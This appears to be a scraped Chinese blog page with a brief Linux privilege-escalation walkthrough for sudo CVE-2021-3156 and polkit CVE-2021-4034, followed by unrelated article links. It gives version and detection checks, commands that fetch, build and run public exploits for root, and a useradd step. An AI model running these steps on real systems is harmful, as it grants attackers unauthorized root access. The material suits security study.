当前位置: 首页 > news >正文

Linux提权--SUDO(CVE-2021-3156)Polkit(CVE-2021-4034)

免责声明:本文仅做技术学习与交流...

目录

SUDO(CVE-2021-3156)

影响版本

-判断:

-利用:

Polkit(CVE-2021-4034) ​

-判断:

-利用:

添加用户


SUDO(CVE-2021-3156)

another: SUDO权限配置不当.

影响版本

由系统的内核和发布版本等等决定...(版本符合基本就拿下)

sudo: 1.8.2 - 1.8.31p2

sudo: 1.9.0 - 1.9.5p1

sudo 命令 
sudo --version
​

-判断:

1-sudo版本判断.

2-命令报错判断:

sudoedit -s /         --报错则存在漏洞.

-利用:

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make 
chmod a+x sudo-hax-me-a-sandwich
​
uname -a    #查看内核版本
id
#最后的参数自己选:
./sudo-hax-me-a-sandwich 1 
-->提权之后的会话就是root权限了
​

Polkit(CVE-2021-4034) ​

vulhub/polkit/CVE-2021-4034/README.zh-cn.md at master · vulhub/vulhub · GitHub

漏洞影响2009年5月至今的所有polkit版本.

由于polkit是系统预装工具,所有存在polkit的linux系统均受影响

如:CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等

-判断:

dpkg -l policykit-1

--有信息就是有.

-利用:

git clone https://github.com/berdav/CVE-2021-4034.git

--没有git命令就自己上传.或wget命令

yum install git

cd CVE-2021-4034/make./cve-2021-4034id

---判断一下--发现没有--->上来就直接干

--上传--打开时用到的权限还是test的,所以就不要直接上传,用wget...

--运行之后没有结果就GG...

添加用户

useradd -d /home/test -m test

http://www.lryc.cn/news/347803.html

相关文章:

  • nodejs里面的 http 模块介绍和使用
  • MVC框架简易实现【精细】
  • Java入门基础学习笔记18——赋值运算符
  • csv 可视化 python代码
  • HashMap 和 Hashtable区别的底层原理
  • 代码随想录35期Day32-Java
  • ROS 2边学边练(45)-- 构建一个能动的机器人模型
  • 【第66例】IPD体系进阶:华为IPD发展历程
  • websevere服务器从零搭建到上线(四)|muduo网络库的基本原理和使用
  • C语言笔记10
  • BMS-HiL主要功能
  • idea无法识别加载pom.xml文件
  • C语言笔记12
  • 说一下 hibernate 的缓存机制?
  • Mac安装jadx
  • 风扇开启执行逻辑
  • 调用函数实现数组的输入排序插入与输出
  • 代码随想录算法训练营Day 41| 动态规划part03 | 343. 整数拆分、96.不同的二叉搜索树
  • 多模态产品在智能文档处理应用的展望------以TextIn模型为例
  • 上海市计算机学会竞赛平台2024年3月月赛丙组最近的数字
  • RFID在汽车制造中的应用如何改变行业
  • sCrypt受邀在中国人民大学举办《区块链与数字经济》课程讲座
  • pc端的鼠标箭头变换
  • ICode国际青少年编程竞赛- Python-2级训练场-for循环练习2
  • RiPro主题美化【支付弹窗底部提示语根据入口不同有不同的提示】ritheme主题美化RiProV2 增加支付提示语,按支付类型不同,入口不同提示语不同的设置
  • MSMQ消息队列
  • 树莓派nmap扫描
  • 【必看】Spring系列面试题
  • wordpress增加谷歌分析
  • linux的信号量的使用